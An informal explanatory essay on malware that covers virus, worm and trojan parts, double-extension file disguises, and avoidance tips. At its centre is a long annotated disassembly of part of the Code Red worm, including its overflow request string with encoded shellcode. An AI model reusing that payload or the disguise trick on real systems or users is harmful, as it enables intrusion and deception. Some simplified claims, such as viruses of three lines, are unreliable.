Malware

The departure from the 1980's and the advent of the internet on home computers world wide, as well as the increase in communication speed and decrease in cost of networking, information has become increasingly less secure. High speed internet connections have created an additional security breach, as they are continuously connected, unlike archaic phone connections of modems.

Cybercrime has continued to increase at an exponential rate, but more so for malware. I believe this is due mainly to the passive nature of malware. Unlike hacking single computers or networks, which require great amounts of time and work to affect a single entity, a virus can be generated by a novice coder and deployed to a few open systems without ever actively penetrating a system. The malicious software can then infect millions of computers without ever requiring additional information or control from the creator.

Additionally, in current media, only the hackers who try to bring down networks and actively pursue network cracking are apprehended and punished. Yet those who deploy viruses are usually faceless, rarely mentioned, or only punished if they also actively crack a network or commit conventional crimes. The common consensus among people without a tech background, is that malware creators are not apprehended.

However, they are caught and punished, even worldwide.

So what do these programs actually look like?

In reality, very small. When you are trying to remain undetected, smaller is better. It also allows for quicker transmission over networks.

There are three parts to to any piece of malware:

Repeater: A section of code that allows the program to reproduce itself.

Concealer: A section of code that allows the program to append itself to harmless programs, or mascaraed as a harmless file.

Payload: This is the code that enables the software to damage or change the system. This could be anything from creating windows with advertisement to deleting or corrupting system or boot files.

This means that a virus or worm can be as small as 3 lines of code.

Trojans are larger, but make use of a concealer by being joined with another file, such as a jpg. By doing this, then renaming the file randomnakedwoman.jpg.exe, a messenger program such as ICQ or MSN will leave off the last extension, so that the file will appear to be randomnakedowman.jpg. This can be replicated using something like newtpsreportcoversheet.doc.exe.

The code for these programs is rather anticlimactic to the average person. There are no "destroy computer!!!!" type commands, no embedded videos of a talking Davinci paintings with voices overs, and no slick user interfaces with a single password box. In fact, the average person would think it was merely a page full of gibberish.

The following is actual code from the "code red" worm that infected the whitehouse.gov website:

seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 47 45 54 20 2F 64+aGetDefault_ida db 'GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 65 66 61 75 6C 74+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 2E 69 64 61 3F 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db '8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'f%u0078%u0000%u00=a HTTP/1.0',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-type: text/xml',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'HOST:www.worm.com',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db ' Accept: */*',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-length: 3569 ',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 0Dh,0Ah
seg000:000001D6
seg000:000001D6 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:000001D6
seg000:000001D6 ; this is the worm body. this is the code that actually does the work
seg000:000001D6 ; Attributes: bp-based frame
seg000:000001D6
seg000:000001D6 WORM proc near
seg000:000001D6
seg000:000001D6 var_218 = byte ptr -218h
seg000:000001D6 var_190 = dword ptr -190h
seg000:000001D6
seg000:000001D6 55 push ebp
seg000:000001D7 8B EC mov ebp, esp ; switch esp to ebp
seg000:000001D9 81 EC 18 02 00 00 sub esp, 218h ; set up space for local variables
seg000:000001DF 53 push ebx ; save a few regs
seg000:000001E0 56 push esi
seg000:000001E1 57 push edi
seg000:000001E2 8D BD E8 FD FF FF lea edi, [ebp+var_218] ; fill in stack vars with 0xcc
seg000:000001E8 B9 86 00 00 00 mov ecx, 86h ; '�'
seg000:000001ED B8 CC CC CC CC mov eax, 0CCCCCCCCh
seg000:000001F2 F3 AB repe stosd ; Store String
seg000:000001F4 C7 85 70 FE FF FF+ mov [ebp+var_190], 0 ; set 190h to 0
seg000:000001F4 00 00 00 00 ; this zeros out the memory that holds the GetProcAddress Call.
seg000:000001FE E9 0A 0B 00 00 jmp WORMCONTINUE ; Jump
seg000:000001FE WORM endp
seg000:000001FE
seg000:00000203
seg000:00000203 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:00000203
seg000:00000203
seg000:00000203 DataSetup proc near ; CODE XREF: seg000:00000D0Dp
seg000:00000203 8F 85 68 FE FF FF pop dword ptr [ebp-198h]
seg000:00000209 8D BD F0 FE FF FF lea edi, [ebp-110h] ; set ebp -198h to address of the data segment
seg000:00000209 ; set edi to ebp -110
seg000:0000020F 64 A1 00 00 00 00 mov eax, large fs:0 ; set eax to an ebp+val
seg000:00000215 89 47 08 mov [edi+8], eax ; set ebp+118 to 0
seg000:00000218 64 89 3D 00 00 00+ mov large fs:0, edi ; set fs reg ?
seg000:0000021F E9 6F 0A 00 00 jmp JUMP_TABLE1 ; Jump
seg000:0000021F DataSetup endp
seg000:0000021F
seg000:00000224
seg000:00000224 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:00000224
seg000:00000224
seg000:00000224 DO_RVA proc near ; CODE XREF: seg000:00000C93p
seg000:00000224 8F 85 60 FE FF FF pop dword ptr [ebp-1A0h]
seg000:0000022A C7 85 F0 FE FF FF+ mov dword ptr [ebp-110h], 0FFFFFFFFh ; set 110h to 0xffffffff
seg000:00000234 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax to the data address
seg000:0000023A 83 E8 07 sub eax, 7 ; sub 7 from the data segment, putting you at: oD0B
seg000:0000023D 89 85 F4 FE FF FF mov [ebp-10Ch], eax ; set ebp - 10c to oD0B
seg000:00000243 C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 77E00000h ; set 1a8 to 0x780000
seg000:00000243 00 00 E0 77 ; __NULL_IMPORT_DESCRIPTOR+15D4h
seg000:0000024D E8 9B 0A 00 00 call DO_REWRITE ; jump into ced, do stuff, then jump back
seg000:00000252
seg000:00000252 RVA_TOP: ; CODE XREF: DO_RVA+213j
seg000:00000252 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; this is null on the first loop through, due to a null set at init.
seg000:00000252 00 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:00000259 0F 85 DD 01 00 00 jnz GETPROC_LOADED ; go here after GetProcAddr Is loaded
seg000:0000025F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 77E00000
seg000:00000265 81 C1 00 00 01 00 add ecx, 10000h ; make ecx 0x77e10000
seg000:0000026B 89 8D 58 FE FF FF mov [ebp-1A8h], ecx
seg000:00000271 81 BD 58 FE FF FF+ cmp dword ptr [ebp-1A8h], 78000000h ; is it msvcrt?
seg000:0000027B 75 0A jnz short NOT_MSVCRT ; if it is not, then jump here
seg000:0000027D C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 0BFF00000h
seg000:00000287
seg000:00000287 NOT_MSVCRT: ; CODE XREF: DO_RVA+57j
seg000:00000287 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:0000028D 33 C0 xor eax, eax ; null out eax
seg000:0000028F 66 8B 02 mov ax, [edx] ; move the low half of *edx into eax
seg000:0000028F ; should be something like 5a4d
seg000:00000292 3D 4D 5A 00 00 cmp eax, 5A4Dh ; Compare Two Operands
seg000:00000297 0F 85 9A 01 00 00 jnz TO_RVA_TOP ; jump if eax is not 5a4d
seg000:0000029D 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002A3 8B 51 3C mov edx, [ecx+3Ch] ; set edx to *ecx+3ch
seg000:000002A3 ; should be something like 0x000000D8
seg000:000002A6 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to 0x77E10000
seg000:000002AC 33 C9 xor ecx, ecx ; null out ecx
seg000:000002AE 66 8B 0C 10 mov cx, [eax+edx] ; set ecx to what is at eax+edx
seg000:000002AE ; should be something like 0x00004550
seg000:000002B2 81 F9 50 45 00 00 cmp ecx, 4550h ; Compare Two Operands
seg000:000002B8 0F 85 79 01 00 00 jnz TO_RVA_TOP ; jump if ecx is not 0x00004550
seg000:000002BE 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:000002C4 8B 42 3C mov eax, [edx+3Ch] ; set eax to what's at 0x77E1003Ch
seg000:000002C4 ; should be something like 0x000000D8
seg000:000002C7 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002CD 8B 54 01 78 mov edx, [ecx+eax+78h] ; set edx to what's at address 0x77E100B4
seg000:000002CD ; should be somehing like 51E00
seg000:000002D1 03 95 58 FE FF FF add edx, [ebp-1A8h] ; add 0x77E10000 to edx
seg000:000002D7 89 95 54 FE FF FF mov [ebp-1ACh], edx ; set ebp-1AC to 0x77E61E00
seg000:000002DD 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; set eax to 0x77E61E00
seg000:000002E3 8B 48 0C mov ecx, [eax+0Ch] ; set ecx to what is at 0x77E61E0C
seg000:000002E3 ; should be something like 0x005394E
seg000:000002E6 03 8D 58 FE FF FF add ecx, [ebp-1A8h] ; add 0x77E10000 to ecx, to get something like 0x77E6394e
seg000:000002EC 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; set ebp-1B4 to 77E6394E
seg000:000002F2 8B 95 4C FE FF FF mov edx, [ebp-1B4h] ; set edx to 77E6394E
seg000:000002F8 81 3A 4B 45 52 4E cmp dword ptr [edx], 4E52454Bh ; looking for our specific code (NREK) - KERN spelled backwards.. this is to find KERNEL32
seg000:000002FE 0F 85 33 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000304 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:0000030A 81 78 04 45 4C 33+ cmp dword ptr [eax+4], 32334C45h ; looking for our specific code (23LE) - EL32 spelled backwards.. this is to find KERNEL32
seg000:00000311 0F 85 20 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000317 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; ok, we have kernel32, now get the functions we need.
seg000:0000031D 89 8D 34 FE FF FF mov [ebp-1CCh], ecx ; store the kernel32 base addr.
seg000:00000323 8B 95 54 FE FF FF mov edx, [ebp-1ACh] ; set edx to the offset from the base
seg000:00000329 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to the base
seg000:0000032F 03 42 20 add eax, [edx+20h] ; add the offset pointer to the base to get the RVA addr.
seg000:00000332 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1b4 with rva holder
seg000:00000338 C7 85 48 FE FF FF+ mov dword ptr [ebp-1B8h], 0 ; set ebp-1b8 to 0
seg000:00000342 EB 1E jmp short RVA_PROCESS_FUNC ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000342 ;
seg000:00000344 ; ���������������������������������������������������������������������������
seg000:00000344
seg000:00000344 RVA_INNER_TOP: ; CODE XREF: DO_RVA+20Ej
seg000:00000344 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h] ; this moves on to the next func in an rva table
seg000:0000034A 83 C1 01 add ecx, 1 ; Add
seg000:0000034D 89 8D 48 FE FF FF mov [ebp-1B8h], ecx
seg000:00000353 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000359 83 C2 04 add edx, 4 ; Add
seg000:0000035C 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:00000362
seg000:00000362 RVA_PROCESS_FUNC: ; CODE XREF: DO_RVA+11Ej
seg000:00000362 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000362 ;
seg000:00000368 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h]
seg000:0000036E 3B 48 18 cmp ecx, [eax+18h] ; Compare Two Operands
seg000:00000371 0F 8D C0 00 00 00 jge TO_RVA_TOP ; this is the end of the inside loop(there are no more functions), goto RVA top and try again.
seg000:00000377 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:0000037D 8B 02 mov eax, [edx]
seg000:0000037F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:00000385 81 3C 01 47 65 74+ cmp dword ptr [ecx+eax], 50746547h ; looking for GetProcAddr (PteG cmp)
seg000:0000038C 0F 85 A0 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:00000392 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000398 8B 02 mov eax, [edx]
seg000:0000039A 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:000003A0 81 7C 01 04 72 6F+ cmp dword ptr [ecx+eax+4], 41636F72h ; looking for GetProcAddr (Acor cmp)
seg000:000003A8 0F 85 84 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:000003AE 8B 95 48 FE FF FF mov edx, [ebp-1B8h] ; it did match this is GetPRocAddr, need to get the mapped RVA for this func.
seg000:000003B4 03 95 48 FE FF FF add edx, [ebp-1B8h] ; get offset into table and double it
seg000:000003BA 03 95 58 FE FF FF add edx, [ebp-1A8h] ; get RVA Base for Kernel32.dll
seg000:000003C0 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:000003C6 8B 48 24 mov ecx, [eax+24h]
seg000:000003C9 33 C0 xor eax, eax ; NULL out eax
seg000:000003CB 66 8B 04 0A mov ax, [edx+ecx]
seg000:000003CF 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1B4 to offset into rva table
seg000:000003D5 8B 8D 54 FE FF FF mov ecx, [ebp-1ACh]
seg000:000003DB 8B 51 10 mov edx, [ecx+10h]
seg000:000003DE 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:000003E4 8D 4C 10 FF lea ecx, [eax+edx-1] ; Load Effective Address
seg000:000003E8 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:000003EE 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:000003F4 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:000003FA 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000400 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000406 03 95 58 FE FF FF add edx, [ebp-1A8h] ; Add
seg000:0000040C 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:00000412 8B 48 1C mov ecx, [eax+1Ch]
seg000:00000415 8B 14 0A mov edx, [edx+ecx]
seg000:00000418 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:0000041E 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:00000424 03 85 58 FE FF FF add eax, [ebp-1A8h] ; Add
seg000:0000042A 89 85 70 FE FF FF mov [ebp-190h], eax ; set ebp-190 to GetProcAddr Address
seg000:00000430 EB 05 jmp short TO_RVA_TOP ; Jump
seg000:00000432 ; ���������������������������������������������������������������������������
seg000:00000432
seg000:00000432 TO_RVA_INNER_TOP: ; CODE XREF: DO_RVA+168j
seg000:00000432 ; DO_RVA+184j
seg000:00000432 E9 0D FF FF FF jmp RVA_INNER_TOP ; this moves on to the next func in an rva table
seg000:00000437 ; ���������������������������������������������������������������������������
seg000:00000437
seg000:00000437 TO_RVA_TOP: ; CODE XREF: DO_RVA+73j
seg000:00000437 ; DO_RVA+94j ...
seg000:00000437 E9 16 FE FF FF jmp RVA_TOP ; this is null on the first loop through, due to a null set at init.
seg000:00000437 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:0000043C ; ���������������������������������������������������������������������������
seg000:0000043C
seg000:0000043C GETPROC_LOADED: ; CODE XREF: DO_RVA+35j
seg000:0000043C 8D BD F0 FE FF FF lea edi, [ebp-110h] ; Load Effective Address
seg000:00000442 8B 47 08 mov eax, [edi+8]
seg000:00000445 64 A3 00 00 00 00 mov large fs:0, eax
seg000:0000044B 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; see if getprocaddr is loaded
seg000:00000452 75 05 jnz short GPLOADED2 ; if it is, goto gploaded2
seg000:00000454 E9 38 08 00 00 jmp TIGHT_LOOP ; else, goto locC91
seg000:00000459 ; ���������������������������������������������������������������������������
seg000:00000459
seg000:00000459 GPLOADED2: ; CODE XREF: DO_RVA+22Ej
seg000:00000459 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 1 ; set ebp-1b4 to 1
seg000:00000463 EB 0F jmp short GETPROC_LOOP_TOP ; load edx with the data segment
seg000:00000465 ; ���������������������������������������������������������������������������
seg000:00000465
seg000:00000465 GETPROC_LOOP_INC: ; CODE XREF: DO_RVA+2E9j
seg000:00000465 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; increment the counter at ebp-ib4
seg000:0000046B 83 C1 01 add ecx, 1 ; Add
seg000:0000046E 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:00000474
seg000:00000474 GETPROC_LOOP_TOP: ; CODE XREF: DO_RVA+23Fj
seg000:00000474 8B 95 68 FE FF FF mov edx, [ebp-198h] ; load edx with the data segment
seg000:0000047A 0F BE 02 movsx eax, byte ptr [edx] ; move the byte at data segment to eax
seg000:0000047D 85 C0 test eax, eax ; check if the byte is null. This signifies the end of the function data section.
seg000:0000047F 0F 84 8D 00 00 00 jz FUNC_LOAD_DONE ; if it is, go here
seg000:00000485 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load ecx with the data segment
seg000:0000048B 0F BE 11 movsx edx, byte ptr [ecx] ; load edx wuith the byte at data segment
seg000:0000048E 83 FA 09 cmp edx, 9 ; check if the byte specifies change of dll
seg000:00000491 75 21 jnz short loc_4B4 ; if not, jump here
seg000:00000493 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to current data pointer
seg000:00000499 83 C0 01 add eax, 1 ; get past the 9
seg000:0000049C 8B F4 mov esi, esp
seg000:0000049E 50 push eax ; push current data pointer
seg000:0000049F FF 95 90 FE FF FF call dword ptr [ebp-170h] ; LoadLibraryA
seg000:000004A5 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000004A7 90 nop ; No Operation
seg000:000004A8 43 inc ebx ; Increment by 1
seg000:000004A9 4B dec ebx ; Decrement by 1

Note that this is not the entire worm, only a portion of it. Other examples can be found here.




what is the difference between a virus, trojan, and worm?

A virus is a self replicating program that is intended to harm as many files as possible. It requires an external mode of transportation (as an email attachment or embedded in a file) in order to spread. It also requires some user action to deploy, such as opening said file or attachment.

A worm is a self replicating file, usually designed to steal data, though it can also damage systems as well. Because worms are able to transmit themselves over a network, they have the DDoS attack vector as well.

A trojan is a .exe file that hides itself on your computer. It can damage system files, but is more likely to open a back door for other malware and spyware to infect your system. The goal of a trojan infection is usually some form of monetary or intelligence gain that will last over an extended period of time. Trojans are harder to spread because they must be contained within an executable file. However, joiner programs join a trojan with a legitimate files as noted above.


How can malware be avoided?

Malware depends on two factors to penetrate networks. The first is weak security. Lack of anti-virus software, firewalls, etc. The second, and most important, is user ignorance.

most all malware can be avoided by intelligent browsing and staying away from the fringes of the internet (Porn, warez, hack, and other underground websites). A good anti-virus program and a router with built in firewall will protect the average user well enough.

Large corporations, however, are targets of continued and increasingly complex attacks. Security within these corporations is usually layered, with dedicated proxy servers and special hardware firewalls integrated into the network.

There is no ultimate defense against malware, because information must enter and leave a network in order for said network to be useful. Anti-virus programs must be written to look for specific patterns within a file to determine if it is infected. Because a malware agent can be written in any one of a million different ways, new programs can go undetected by even the most up-to-date anti-virus software.

Viruses